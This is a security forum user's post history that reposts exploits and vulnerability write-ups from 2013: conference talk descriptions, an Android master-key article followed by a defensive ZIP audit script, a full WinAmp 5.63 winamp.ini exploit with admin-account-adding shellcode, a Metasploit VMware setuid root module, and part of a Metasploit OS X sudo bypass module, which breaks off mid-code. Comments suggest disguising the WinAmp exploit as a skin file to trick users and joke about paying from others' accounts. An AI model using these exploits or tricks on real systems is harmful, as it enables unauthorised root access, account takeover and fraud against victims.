Everything posted by Nytro

  1. Defcon 2013 - The Dawn Of Web 3.0: Website Mapping And Vulnerability Scanning In 3d, Just Like You Saw In The Movies

Description: Remember that scene in Hackers where Jonny Lee Miller and Angelina Jolie get a bunch of hackers to attack Fisher Steven's network through vulnerabilities that they find while flying (literally) through Fisher's network? Even though it had no basis in reality at the time, it was still pretty awesome. This presentation will be like that, except real. This highly demo-focused presentation will unleash the next generation of web application visualization and security flaw detection. Created as part of DARPA's Cyber Fast Track, we have developed a completely awesome way of visualizing, in 3D, how massive numbers of web applications across the Internet are interconnected. This visualization engine provides a simple yet beautiful view of web applications and their vast, sprawling interconnections, all the while incorporating web application vulnerabilities into the visual metadata.

Teal Rogers is a dedicated maker and software designer who has been advancing existing products through innovative new interfaces for years. Between being a brilliant imagineer, rogue inventor, warrior-poet, master of surprise, and student of the arcane he has managed to design and sell the highest quality laser gloves on the market. More recently, he has been inexorably drawn to the nascent power of the 3rd dimension.

Alejandro Caceres is a computer network operations engineer focused on network offense software development and web application penetration testing and security. He is particularly interested in using distributed computing and offensive security principles to create cool/new/revolutionary open source and free applications with a global impact.

Source: Defcon 2013 - The Dawn Of Web 3.0: Website Mapping And Vulnerability Scanning In 3d, Just Like You Saw In The Movies

Kewl stuff
  2. Kali Linux - Backdooring Windows 8

https://www.youtube.com/watch?feature=player_embedded&v=tlQf8VJgy70

Description: In this video you will learn how to exploit Windows 8 using the Metasploit Framework and how you can maintain your access on Windows 8 using Kali Linux and Metasploit.

Source: Kali Linux - Backdooring Windows 8
  3. Gps Hacking

Description: GPS Hacking. For more information please visit: Bsides Las Vegas 2013 Videos (Hacking Illustrated Series InfoSec Tutorial Videos) BSidesLV

Source: Gps Hacking
  4. Windows Universal Privilege Escalation Exploit

Description: Windows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit demo

Skiddie, but possibly useful/necessary.

Source: Windows Universal Privilege Escalation Exploit
  5. Android Master Key Vulnerability—PoC
Rohit T, August 28, 2013

The recently discovered master key vulnerability in Android has given a jolt to the Android team and other parties involved. This vulnerability allows attackers to inject malicious code into legitimate Android applications without invalidating the digital signature. It’s very easy for hackers and attackers to take advantage of this vulnerability and exploit it. The news is already out that there are apps currently on the market that are exploiting this vulnerability. This was revealed at the recent Black Hat Conference 2013, although some researchers were able to publish the news a week before. So let’s look into what the issue is, how hackers can exploit it, and what needs to be done to fix it.

[h=2]How Does Android Code Signing Work?[/h]

Android applications are .APK files (Android Packages), which are nothing but a collection of ZIP archives. For easy understanding, let us open up an APK file for an application and find out the same. Consider the application MyFirstApp.apk, which is signed by my certificate. Let us talk a little bit more about this signing process before we go ahead and understand the underlying issue.

Android requires that all installed applications be digitally signed with a certificate whose private key is held by the application’s developer. Why would you want to sign the piece of code? For two reasons basically—authenticity and integrity. Before installing any application, I want to make sure that the application isn’t tampered with (integrity checking) and that it was created by the right person (authenticity checking). The Android system uses the certificate as a means of identifying the author of an application and establishing trust relationships between applications. The Android system will not install or run an application that is not signed. So, after building an application and signing it with a certificate, you basically have an APK file at the end.

MyFirstApp.apk

MyFirstApp.apk is a simple application (just a random application) and looks like this when installed on the emulator. APK files are nothing but a collection of zip files, so if you rename an .apk extension as .zip you will be able to see the contents of the file. As you can see, the APK file consists of a subdirectory called META-INF, which contains signed checksums for all the other files in the package. The main manifest file (MANIFEST.MF) has entries with the file name and digest-value of each file in the archive.

Now, if you modify any of the files in this package, Android will block the installation of the package to prevent the users from harmful activities. Android does this by verifying the checksum. In order to verify the checksum of each of these files, Android has to extract each of these files from the APK archive. This is accomplished using the Java unzipping library, which will parse the ZIP-format APK file, extract each file object, and match it up with the corresponding checksum mentioned in the manifest file in META-INF.

Now try to modify any of these files; for example, modify the launch image file inside the MyFirstApp.zip\res\drawable-hdpi folder, rebuild it, and try to install it on the device using adb, and you will find that Android rightly notices it and shows this message:

[h=2]How Is the Attack Accomplished?[/h]

The vulnerability is based on the exploitation of the way in which Android verifies and installs the application. This helps in inserting code into the application without modifying the cryptographic signature. The attack successfully bypasses this verification process and installs the application with any changes the hacker embeds in the code. The attack is based on the concept of placing two different files in the APK archive with the same name. Regular ZIP software generally does not allow you to have two files with the same name in one archive. But the ZIP format itself doesn’t prevent duplicated filenames, and you can take advantage of this to create an archive with repeated file names as shown below.

The ic_launcher.png file is something that I have added to the existing file, creating a new APK file named HackedFile.zip. Now rename this file to HackedFile.apk and try to install it; you will observe that Android accepts it this time. It runs successfully without any complaints. Note that I was able to replace the launch image successfully without using any certificate and Android happily accepts the same.

[h=2]How Is This Even Possible?[/h]

This is possible because Android verifies the first version of any file in the archive but the installer verifies and extracts the last version of the file. Thus the legitimate file is checked by the cryptographic verifier and the one added by the hacker is installed by the installer. In simple words, what gets installed is the fake, but what gets verified for the signature is the legitimate part.

[h=2]What Are the Implications?[/h]

The implications are huge. The most important thing to note is that almost all versions of Android are vulnerable to this attack. The impact of this vulnerability and its exploitation is only limited by the imagination of a hacker. For instance, he can spy on your communication or he can go a step further and send premium rate SMS without the user’s knowledge, make background calls, take pictures and forward them by mail, etc. Some of the built-in apps that come along with the phone have higher privileges than the other applications which are installed from the Play Store, so an attacker can take advantage of this and create apps that have system-level privileges. A Trojan application that is installed from a device application can access the entire Android system, its applications and their data. As explained by Jeff Forristal, an attacker can then create a botnet with the always internet-connected mobile phones.

The Bluebox team has successfully demonstrated this and changed the name of the kernel, etc. Symantec researchers have already discovered that the bug is being exploited in the wild by attackers publishing popular games on third-party sites. Google has already released patches for this but, as everyone knows, it will certainly take some time for the handset makers to update all of their models. Google is now verifying all the applications in the Play Store to check for the master key vulnerability. But the other third-party stores and the side loading of apps aren’t going to help the cause.

[h=2]What Precautions Could Help Users to Stay Away from This?[/h]

It’s important to download the apps only from the Google Play Store and, even while downloading from the Play Store, make sure that you verify the author of the application before downloading it. Do not install applications from untrusted sources or other Android stores. Similarly, say “No” to side loading of applications. In short, make sure you identify the publisher of the application before you install one. Google has already rolled out patches for this. Make sure you update your mobile with the latest patches available. Apart from these, an application also released in the Play Store, “Blue Box Security Scanner,” will scan your device and let you know whether it is vulnerable to this Android master key vulnerability. Here is one screenshot of the program.

Video

Here is the video link that practically demonstrates how this can be accomplished:

Source: Android Master Key Vulnerability—PoC
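As an added example, not part of the original post or of the article it reproduces: a Python 3 script that builds a small constructed stand-in for an APK, appends a second entry with the same name the way the article describes, and audits the result from the defender's side. It walks the ZIP central directory by hand (so every listed entry is seen, instead of being collapsed by name) and checks the first and the last copy of each duplicated name against the SHA-1 digest recorded in META-INF/MANIFEST.MF, which reproduces the "first copy verified, last copy extracted" mismatch the article explains. The file names, contents and manifest layout are constructed for the demonstration; the assumed names `build_sample_apk`, `find_duplicate_entries` and `audit` are this example's own.

```python
import base64
import hashlib
import io
import struct
import warnings
import zipfile
import zlib
from collections import defaultdict

CD_SIG, LOCAL_SIG, EOCD_SIG = b"PK\x01\x02", b"PK\x03\x04", b"PK\x05\x06"
ICON = "res/drawable-hdpi/ic_launcher.png"   # the entry the article duplicates

def sha1_b64(blob):
    """Digest form used by MANIFEST.MF: base64 of the SHA-1 of the file bytes."""
    return base64.b64encode(hashlib.sha1(blob).digest()).decode()

def build_sample_apk(with_duplicate):
    """Constructed stand-in for an APK (not a real package): a tiny ZIP whose manifest carries a
    digest for the icon. With with_duplicate=True a second entry with the same name is appended."""
    icon = b"ORIGINAL-ICON-BYTES"
    manifest = ("Manifest-Version: 1.0\n\nName: %s\nSHA1-Digest: %s\n\n" % (ICON, sha1_b64(icon))).encode()
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as z:
        z.writestr("META-INF/MANIFEST.MF", manifest)
        z.writestr("AndroidManifest.xml", b"<manifest/>")
        z.writestr(ICON, icon)
        if with_duplicate:
            with warnings.catch_warnings():
                warnings.simplefilter("ignore")  # zipfile only warns on a duplicate name; the format allows it
                z.writestr(ICON, b"REPLACED-ICON-BYTES")
    return buf.getvalue()

def central_directory_entries(data):
    """Walk the central directory by hand and yield every entry, duplicates included.
    (A name-keyed convenience API would silently keep only one entry per name.)"""
    eocd = data.rfind(EOCD_SIG)
    if eocd < 0:
        raise ValueError("no end-of-central-directory record")
    _, _, _, _, total, _, cd_offset, _ = struct.unpack("<4sHHHHIIH", data[eocd:eocd + 22])
    pos = cd_offset
    for _ in range(total):
        if data[pos:pos + 4] != CD_SIG:
            raise ValueError("bad central directory entry at offset %d" % pos)
        f = struct.unpack("<4sHHHHHHIIIHHHHHII", data[pos:pos + 46])
        name_len, extra_len, comment_len = f[10], f[11], f[12]
        yield {"name": data[pos + 46:pos + 46 + name_len].decode("utf-8"),
               "method": f[4], "crc": f[7], "comp_size": f[8], "offset": f[16]}
        pos += 46 + name_len + extra_len + comment_len

def entry_data(data, entry):
    """Read one entry's bytes through its local header (stored or deflated entries only)."""
    off = entry["offset"]
    if data[off:off + 4] != LOCAL_SIG:
        raise ValueError("bad local header at offset %d" % off)
    name_len, extra_len = struct.unpack("<HH", data[off + 26:off + 30])
    start = off + 30 + name_len + extra_len
    raw = data[start:start + entry["comp_size"]]
    return raw if entry["method"] == 0 else zlib.decompress(raw, -15)

def find_duplicate_entries(data):
    """{name: [entries...]} for every name the central directory lists more than once."""
    seen = defaultdict(list)
    for e in central_directory_entries(data):
        seen[e["name"]].append(e)
    return {n: es for n, es in seen.items() if len(es) > 1}

def manifest_digests(data):
    """Parse META-INF/MANIFEST.MF into {name: SHA1-Digest}."""
    entries = {e["name"]: e for e in central_directory_entries(data)}
    text = entry_data(data, entries["META-INF/MANIFEST.MF"]).decode("utf-8")
    digests, current = {}, None
    for line in text.splitlines():
        if line.startswith("Name: "):
            current = line[len("Name: "):]
        elif line.startswith("SHA1-Digest: ") and current:
            digests[current] = line[len("SHA1-Digest: "):]
    return digests

def audit(data):
    """For each duplicated name, report whether the first copy (what a verifier that stops at the
    first match checks) and the last copy (what an extractor that keeps the last one installs)
    match the manifest digest. An empty result means no duplicated names."""
    digests = manifest_digests(data)
    report = {}
    for name, copies in find_duplicate_entries(data).items():
        expected = digests.get(name)
        report[name] = {"first_matches_manifest": sha1_b64(entry_data(data, copies[0])) == expected,
                        "last_matches_manifest": sha1_b64(entry_data(data, copies[-1])) == expected}
    return report

if __name__ == "__main__":
    for label, with_dup in (("clean", False), ("duplicated", True)):
        print(label, audit(build_sample_apk(with_dup)))
```

The rule a store-side scanner or a device-side verifier wants is simply "reject when `find_duplicate_entries` is non-empty"; the digest comparison in `audit` is there to make the verifier/extractor disagreement visible on the sample. `entry_data` handles only stored and deflated entries, which is what APK build tools emit.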
  7. [h=1]WinAmp 5.63 (winamp.ini) - Local Exploit[/h]

# Exploit Title: winampevilskin.py
# Date: 25 August 2013
# Exploit Author: Ayman Sagy <aymansagy@gmail.com>
# Vendor Homepage: http://www.winamp.com/
# Version: 5.63
# Tested on: Windows XP Professional SP3 Version 2002
# CVE : 2013-4694
#
# Ayman Sagy <aymansagy@gmail.com> August 2013
#
# This is an exploit for Bug #1 described in http://www.exploit-db.com/exploits/26558/
# Credit for discovering the vulnerability goes to Julien Ahrens from Inshell Security
#
# The exploit will generate a winamp.ini file that will cause winamp to run the payload upon startup
#
#
# I tried an alpha3 encoded egghunter but could not fit it in a single buffer and unfortunately it did not work, it wrote an invalid address on the stack then tried to access it
# If you can make it work or find a solution for ASLR/DEP please contact me
#
# So I wrote from scratch a venetian shellcode that will write the egghunter onto the stack then executes it
# The egg and shellcode can be found in plain ASCII in memory
#
# Tested against Windows XP Pro SP3
# Note: If you add winamp as an exception to DEP the return address becomes 0x003100F0 instead of 0x003000F0
# run with Python 2.7

import sys, getopt, os

def usage():
    print('winampevilskin.py by Ayman Sagy <aymansagy@gmail.com>\n')
    print('Usage: python ' + sys.argv[0] + ' -p <payload>')
    print('Payload could be:')
    print('\t[user] to create new admin account ayman/P@ssw0rd')
    print('\t[calc] run calculator')
    print('for e.g.: python ' + sys.argv[0] + ' -p user')

#appdata = os.environ['APPDATA']

# Windows add admin user: ayman P@ssw0rd
scadduser = (
b"\xbf\xab\xd0\x9a\x5b\xda\xc7\xd9\x74\x24\xf4\x5a\x2b\xc9" +
"\xb1\x45\x83\xc2\x04\x31\x7a\x11\x03\x7a\x11\xe2\x5e\x2c" +
"\x72\xd2\xa0\xcd\x83\x85\x29\x28\xb2\x97\x4d\x38\xe7\x27" +
"\x06\x6c\x04\xc3\x4a\x85\x9f\xa1\x42\xaa\x28\x0f\xb4\x85" +
"\xa9\xa1\x78\x49\x69\xa3\x04\x90\xbe\x03\x35\x5b\xb3\x42" +
"\x72\x86\x3c\x16\x2b\xcc\xef\x87\x58\x90\x33\xa9\x8e\x9e" +
"\x0c\xd1\xab\x61\xf8\x6b\xb2\xb1\x51\xe7\xfc\x29\xd9\xaf" +
"\xdc\x48\x0e\xac\x20\x02\x3b\x07\xd3\x95\xed\x59\x1c\xa4" +
"\xd1\x36\x23\x08\xdc\x47\x64\xaf\x3f\x32\x9e\xd3\xc2\x45" +
"\x65\xa9\x18\xc3\x7b\x09\xea\x73\x5f\xab\x3f\xe5\x14\xa7" +
"\xf4\x61\x72\xa4\x0b\xa5\x09\xd0\x80\x48\xdd\x50\xd2\x6e" +
"\xf9\x39\x80\x0f\x58\xe4\x67\x2f\xba\x40\xd7\x95\xb1\x63" +
"\x0c\xaf\x98\xe9\xd3\x3d\xa7\x57\xd3\x3d\xa7\xf7\xbc\x0c" +
"\x2c\x98\xbb\x90\xe7\xdc\x34\xdb\xa5\x75\xdd\x82\x3c\xc4" +
"\x80\x34\xeb\x0b\xbd\xb6\x19\xf4\x3a\xa6\x68\xf1\x07\x60" +
"\x81\x8b\x18\x05\xa5\x38\x18\x0c\xc6\xd3\x82\x81\x6d\x54" +
"\x2e\xfe\x42\xc7\x90\x90\xf9\x73\xf1\x19\x72\x19\x83\xc1" +
"\x15\x98\x0e\x63\xbb\x7a\x81\x23\x30\x08\x56\x94\xc4\x8a" +
"\xb8\xfb\x69\x17\xfd\x23\x4f\xb1\xdd\x4d\xea\xc9\x3d\xfe" +
"\x9b\x52\x5f\x92\x04\xe7\xf0\x1f\xba\x27\x4e\x84\x57\x41" +
"\x3e\x2d\xd4\xe5\xcc\xcc\x6e\x69\x43\x7c\xae\x14\xda\xef" +
"\xcf\xb8\x3c\xdf\x4e\x01\x79\x1f" )

# http://shell-storm.org/shellcode/files/shellcode-739.php
sccalc = (b"\x31\xC9"+             # xor ecx,ecx
"\x51"+                            # push ecx
"\x68\x63\x61\x6C\x63"+            # push 0x636c6163
"\x54"+                            # push dword ptr esp
"\xB8\xC7\x93\xC2\x77"+            # mov eax,0x77c293c7
"\xFF\xD0" )

if len(sys.argv) < 2:
    usage()
    exit(1)

try:
    opts, args = getopt.getopt(sys.argv[1:],'p:')
except getopt.GetoptError:
    usage()
    exit(1)

for opt, arg in opts:
    if opt == '-p':
        if arg == 'user':
            shellcode = "aymnaymn" + "\x90" + "\x90" * 100 + scadduser + "\x90" * 89
        elif arg == "calc":
            shellcode = "aymnaymn" + b"\x90" * 452 + b"\x90" + sccalc + b"\x90" * 23
        else:
            print("Error: Invalid payload.\n")
            usage()
            sys.exit()

#print(str(len(shellcode)))

egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"+
"\xef\xb8\x61\x79\x6d\x6e\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")

sploit = (
# Unicode-friendly venetian egghunter writer
# Setup Registers
"\x50\x72\x50"+            # push eax twice
"\x72" +                   # align
"\x59\x72\x5f"+            # pop ecx pop edi
"\x72" +
"\x05\xc2\x02\x01"+        # 05 00020001 ADD EAX,1000200
"\x72"+
"\x2d\xc2\x01\x01"+        # 2D 00010001 SUB EAX,1000100
# EAX is now EAX+100
"\x72\x48"+                # dec eax 4 times
"\x72\x48"+
"\x72\x48"+
"\x72\x48\x72"+
# Pave Ahead
# write NOPs in locations that will stop later execution
"\xc3\x86\xc2\x90"+        # C600 90 MOV BYTE PTR DS:[EAX],90
"\x72\x40\x72"+            # 40 INC EAX
"\xc3\x86\xc2\x90"+
"\x72\x40\x72"+
"\xc3\x86\xc2\x90"+
"\x72\x40\x72"+
"\xc3\x86\xc2\x90"+
"\x72\x40\x72"+
"\xc3\x86\xc2\x90"+
"\x72\x40\x72"+
"\xc3\x86\xc2\x90"+
"\x72\x40\x72"+
"\xc3\x86\xc2\x90"+
"\x72\x40\x72"+
"\xc3\x86\xc2\x90"+
"\x72\x40\x72"+
"\xc3\x86\xc2\x90"+
"\x72\x40\x72"+
"\xc3\x86\xc2\x90"+
"\x72\x40\x72"+
"\xc3\x86\xc2\x90"+
"\x72\x40\x72"+
"\xc2\x91"                 # 91 XCHG EAX,ECX
"\x72" +                   # align
# Start writing egghunter shellcode, EGG = aymn
"\xc3\x86\x66"+
"\x72\x40\x72"+
"\xc3\x86\xc2\x81"+        #81
"\x72\x40\x72"+
"\xc3\x86\xc3\x8a"+        #ca
"\x72\x40\x72"+
"\xc3\x86\xc3\xbf"+
"\x72\x40\x72"+
"\xc3\x86\x0f"+
"\x72\x40\x72"+
"\xc3\x86\x42"+            # 42
"\x72\x40\x72"+
"\xc3\x86\x52"+
"\x72\x40\x72"+
"\xc3\x86\x6a"+
"\x72\x40\x72"+
"\xc3\x86\x02"+
"\x72\x40\x72"+
"\x34" * 4 +               # Padding
"\xc3\xb0\x30"+            # 0x003000F0 CALL EAX winamp.exe WinXP Pro SP3
# Note: If you add winamp as an exception to DEP the return address becomes 0x003100F0 instead of 0x003000F0
"\x72"
"\xc3\x86\x58"+            #58
"\x72\x40\x72"+
"\xc3\x86\xc3\x8d"+        #cd
"\x72\x40\x72"+
"\xc3\x86\x2e"+            #2e
"\x72\x40\x72"+
"\xc3\x86\x3c"+            # 3c
"\x72\x40\x72"+
"\xc3\x86\x05"+            # 5
"\x72\x40\x72"+
"\xc3\x86\x5a"+
"\x72\x40\x72"+
"\xc3\x86\x74"+
"\x72\x40\x72"+
"\xc3\x86\xc3\xaf"+        # ef
"\x72\x40\x72"+
"\xc3\x86\xc2\xb8"+
"\x72\x40\x72"+
"\xc3\x86\x61"+
"\x72\x40\x72"+
"\xc3\x86\x79"+
"\x72\x40\x72"+
"\xc3\x86\x6d"+
"\x72\x40\x72"+
"\xc3\x86\x6e"+
"\x72\x40\x72"+
"\xc3\x86\xc2\x8b"+
"\x72\x40\x72"+
"\xc3\x86\xc3\xba"+        #fa
"\x72\x40\x72"+
"\xc3\x86\xc2\xaf"+        # af
"\x72\x40\x72"+
"\xc3\x86\x75"+            #75
"\x72\x40\x72"+
"\xc3\x86\xc3\xaa"+        #ea
"\x72\x40\x72"+
"\xc3\x86\xc2\xaf"+        # af
"\x72\x40\x72"+
"\xc3\x86\x75"+            #75
"\x72\x40\x72"+
"\xc3\x86\xc3\xa7"+        # e7
"\x72\x40\x72"+
"\xc3\x86\xc3\xbf"+        # ff
"\x72\x40\x72"+
"\xc3\x86\xc3\xa7"+        # e7
"\x72"+
"\x57"+                    # 57 PUSH EDI
"\x72"+                    # align
"\xc3\x83"+                # C3 RETN
"\x34" * 200               # Padding
)

winamp = ("[Winamp]\r\nutf8=1\r\n" +
"skin=" + sploit + "\r\n"
"[WinampReg]\r\nIsFirstInst=0\r\nNeedReg=0\r\n" +
"[in_wm]\r\nnumtypes=7\r\n" +
"type0=WMA\r\ndescription0=Windows Media Audio File (*.WMA)\r\n" +
"protocol0=0\r\navtype0=0\r\n" +
"type1=WMV\r\ndescription1=Windows Media Video File (*.WMV)\r\n" +
"protocol1=0\r\navtype1=1\r\ntype2=ASF\r\n" +
"description2=Advanced Streaming Format (*.ASF)\r\n" +
"protocol2=0\r\navtype2=1\r\ntype3=MMS://\r\n" +
"description3=Windows Media Stream\r\nprotocol3=1\r\n" +
"avtype3=1\r\ntype4=MMSU://\r\n"
"description4=Windows Media Stream\r\nprotocol4=1\r\n" +
"avtype4=1\r\ntype5=MMST://\r\n" +
"description5=Windows Media Stream\r\nprotocol5=1\r\n" +
"avtype5=1\r\ntype5=" + "\x90\x90\xe9\x0f" + "\r\ndescription6=" + shellcode + "\r\nprotocol6=0\r\navtype6=0\r\n")

#f = open(appdata + "\Winamp\winamp.ini", "wb") or sys.exit("Error creating winamp.ini")
f = open("winamp.ini", "wb") or sys.exit("Error creating winamp.ini")
f.write(winamp)
f.close()
print("winamp.ini written, copy it into %APPDATA%\\Winamp")

Source: WinAmp 5.63 (winamp.ini) - Local Exploit

It didn't work for me on Windows 7. I'll try it on XP.

Suggestion: rename the file to ".wsz" (Winamp Skin). If someone double-clicks it, it will ask whether to install the skin and the shellcode should... execute. And it is possible to convince someone to install a new Winamp skin.
  7. Keep them. Permanent ban, no accounts from payment systems or banks.
  8. VMWare Setuid vmware-mount Unsafe popen(3)
Authored by Tavis Ormandy, egypt | Site metasploit.com

VMWare Workstation (up to and including 9.0.2 build-1031769) and Player have a setuid executable called vmware-mount that invokes lsb_release in the PATH with popen(3). Since PATH is user-controlled, and the default system shell on Debian-derived distributions does not drop privs, we can put an arbitrary payload in an executable called lsb_release and have vmware-mount happily execute it as root for us.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/file'

class Metasploit4 < Msf::Exploit::Local
  include Msf::Exploit::EXE
  include Msf::Post::Common
  include Msf::Post::File

  def initialize(info={})
    super( update_info( info, {
      'Name'           => 'VMWare Setuid vmware-mount Unsafe popen(3)',
      'Description'    => %q{
        VMWare Workstation (up to and including 9.0.2 build-1031769) and
        Player have a setuid executable called vmware-mount that invokes
        lsb_release in the PATH with popen(3). Since PATH is user-controlled,
        and the default system shell on Debian-derived distributions does
        not drop privs, we can put an arbitrary payload in an executable
        called lsb_release and have vmware-mount happily execute it as
        root for us.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [
        'Tavis Ormandy', # Vulnerability discovery and PoC
        'egypt'          # Metasploit module
      ],
      'Platform'       => [ 'linux' ],
      'Arch'           => ARCH_X86,
      'Targets'        => [
        [ 'Automatic', { } ],
      ],
      'DefaultOptions' => {
        "PrependSetresuid" => true,
        "PrependSetresgid" => true,
      },
      'Privileged'     => true,
      'DefaultTarget'  => 0,
      'References'     => [
        [ 'CVE', '2013-1662' ],
        [ 'OSVDB', '96588' ],
        [ 'BID', '61966'],
        [ 'URL', 'http://blog.cmpxchg8b.com/2013/08/security-debianisms.html' ],
        [ 'URL', 'http://www.vmware.com/support/support-resources/advisories/VMSA-2013-0010.html' ]
      ],
      'DisclosureDate' => "Aug 22 2013"
    } ))
    # Handled by ghetto hardcoding below.
    deregister_options("PrependFork")
  end

  def check
    if setuid?("/usr/bin/vmware-mount")
      CheckCode::Vulnerable
    else
      CheckCode::Safe
    end
  end

  def exploit
    unless check == CheckCode::Vulnerable
      fail_with(Failure::NotVulnerable, "vmware-mount doesn't exist or is not setuid")
    end

    # Ghetto PrependFork action which is apparently only implemented for
    # Meterpreter.
    # XXX Put this in a mixin somewhere
    #   if(fork()) exit(0);
    # 6A02   push byte +0x2
    # 58     pop eax
    # CD80   int 0x80   ; fork
    # 85C0   test eax,eax
    # 7406   jz 0xf
    # 31C0   xor eax,eax
    # B001   mov al,0x1
    # CD80   int 0x80   ; exit
    exe = generate_payload_exe(
      :code => "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x06\x31\xc0\xb0\x01\xcd\x80" + payload.encoded
    )
    write_file("lsb_release", exe)
    cmd_exec("chmod +x lsb_release")
    cmd_exec("PATH=.:$PATH /usr/bin/vmware-mount")
    # Delete it here instead of using FileDropper because the original
    # session can clean it up
    cmd_exec("rm -f lsb_release")
  end

  # Uses the path it is given (the original hard-coded /usr/bin/vmware-mount
  # and ignored its argument)
  def setuid?(remote_file)
    !!(cmd_exec("test -u #{remote_file} && echo true").index "true")
  end
end

Source: VMWare Setuid vmware-mount Unsafe popen(3) ≈ Packet Storm
  9. Yes, Intel, with their CISC (Complex Instruction Set Computing) processors, is trying to muscle in on ARM, which are RISC (Reduced Instruction Set Computing) processors. So the question becomes: power (Intel) or low consumption (ARM)? I wouldn't mind an Intel Atom in my phone, but I would mind the battery lasting me only 2 hours.
  10. Or read this: Files ≈ Packet Storm. And make a few payments from other people's accounts, buy yourselves a chocolate bar.
  11. Do a disclosure for the duplicate ones. More precisely, I don't think it takes them 2 years to fix an XSS. So in many cases I don't think it's really a duplicate. Threaten to make it public, at least see what they say.
  12. memcpy((void *)(1<<12), &patch_current, 1024);
  13. The purpose of the chat is for "off-topic discussions" to stay off the forum and take place there instead. The purpose of the forum, which is what I care about, is for it to stay clean, and the chat helps in that respect. In other words, we are taking 2 measures:

1. Kabron keeps his moral neutrality on the chat, doesn't play the boss, doesn't swear, and tries to keep some decency in the topics discussed on the chat. He doesn't kick/ban just because he doesn't like a particular user.
2. Matt no longer posts absolutely everything he comes across and makes a quick selection: only exploits in very well-known software, not every plugin or piece of software nobody has heard of, and only interesting news.

And the chat will not be closed, no matter how many thousands of votes you cast for closing it. If you don't find it useful and don't like it, simply DON'T GO IN THERE.
  14. Mac OS X Sudo Password Bypass
Authored by Todd C. Miller, juan vazquez, joev | Site metasploit.com

This Metasploit module gains a session with root permissions on versions of OS X with sudo binary vulnerable to CVE-2013-1775. Tested working on Mac OS 10.7-10.8.4, and possibly lower versions. If your session belongs to a user with Administrative Privileges (the user is in the sudoers file and is in the "admin group"), and the user has ever run the "sudo" command, it is possible to become the super user by running `sudo -k` and then resetting the system clock to 01-01-1970. This Metasploit module will fail silently if the user is not an admin or if the user has never run the sudo command.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#
# http://metasploit.com/
##

require 'shellwords'

class Metasploit3 < Msf::Exploit::Local
  # ManualRanking because it's going to modify system time
  # Even when it will try to restore things, user should use
  # it at his own risk
  Rank = NormalRanking

  include Msf::Post::Common
  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  SYSTEMSETUP_PATH = "/usr/sbin/systemsetup"
  SUDOER_GROUP = "admin"
  VULNERABLE_VERSION_RANGES = [['1.6.0', '1.7.10p6'], ['1.8.0', '1.8.6p6']]

  # saved clock config
  attr_accessor :time, :date, :networked, :zone, :network_server

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Mac OS X Sudo Password Bypass',
      'Description'    => %q{
        This module gains a session with root permissions on versions of OS X with
        sudo binary vulnerable to CVE-2013-1775. Tested working on Mac OS 10.7-10.8.4,
        and possibly lower versions.

        If your session belongs to a user with Administrative Privileges
        (the user is in the sudoers file and is in the "admin group"), and the
        user has ever run the "sudo" command, it is possible to become the super
        user by running `sudo -k` and then resetting the system clock to 01-01-1970.

        This module will fail silently if the user is not an admin or if the user
        has never run the sudo command.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [
        'Todd C. Miller',                # Vulnerability discovery
        'joev <jvennix[at]rapid7.com>',  # Metasploit module
        'juan vazquez'                   # testing/fixing module bugs
      ],
      'References'     => [
        [ 'CVE', '2013-1775' ],
        [ 'OSVDB', '90677' ],
        [ 'BID', '58203' ],
        [ 'URL', 'http://www.sudo.ws/sudo/alerts/epoch_ticket.html' ]
      ],
      'Platform'       => 'osx',
      'Arch'           => [ ARCH_X86, ARCH_X86_64, ARCH_CMD ],
      'SessionTypes'   => [ 'shell', 'meterpreter' ],
      'Targets'        => [
        [ 'Mac OS X x86 (Native Payload)', { 'Platform' => 'osx', 'Arch' => ARCH_X86 } ],
        [ 'Mac OS X x64 (Native Payload)', { 'Platform' => 'osx', 'Arch' => ARCH_X86_64 } ],
        [ 'CMD', { 'Platform' => 'unix', 'Arch' => ARCH_CMD } ]
      ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Feb 28 2013'
    ))

    register_advanced_options([
      OptString.new('TMP_FILE',
        [true, 'For the native targets, specifies the path that '+
        'the executable will be dropped on the client machine.', '/tmp/.<random>/<random>']
      ),
    ], self.class)
  end

  # ensure target is vulnerable by checking sudo vn and checking
  # user is in admin group.
  def check
    if cmd_exec("sudo -V") =~ /version\s+([^\s]*)\s*$/
      sudo_vn = $1
      sudo_vn_parts = sudo_vn.split(/[\.p]/).map(&:to_i)
      # check vn between 1.6.0 through 1.7.10p6
      # and 1.8.0 through 1.8.6p6
      if not vn_bt(sudo_vn, VULNERABLE_VERSION_RANGES)
        print_error "sudo version #{sudo_vn} not vulnerable."
        return Exploit::CheckCode::Safe
      end
    else
      print_error "sudo not detected on the system."
      return Exploit::CheckCode::Safe
    end

    if not user_in_admin_group?
      print_error "sudo version is vulnerable, but user is not in the admin group (necessary to change the date)."
      # explicit return: without it this branch fell through to Vulnerable
      return Exploit::CheckCode::Safe
    end

    # one root for you sir
    Exploit::CheckCode::Vulnerable
  end

  def exploit
    if not user_in_admin_group?
      fail_with(Exploit::Failure::NotFound, "User is not in the 'admin' group, bailing.")
    end

    # "remember" the current system time/date/network/zone
    print_good("User is an admin, continuing...")

    # drop the payload (unless CMD)
    if using_native_target?
      cmd_exec("mkdir -p #{File.dirname(drop_path)}")
      write_file(drop_path, generate_payload_exe)
      register_files_for_cleanup(drop_path)
      cmd_exec("chmod +x #{[drop_path].shelljoin}")
      print_status("Payload dropped and registered for cleanup")
    end

    print_status("Saving system clock config...")
    @time = cmd_exec("#{SYSTEMSETUP_PATH} -gettime").match(/^time: (.*)$/i)[1]
    @date = cmd_exec("#{SYSTEMSETUP_PATH} -getdate").match(/^date: (.*)$/i)[1]
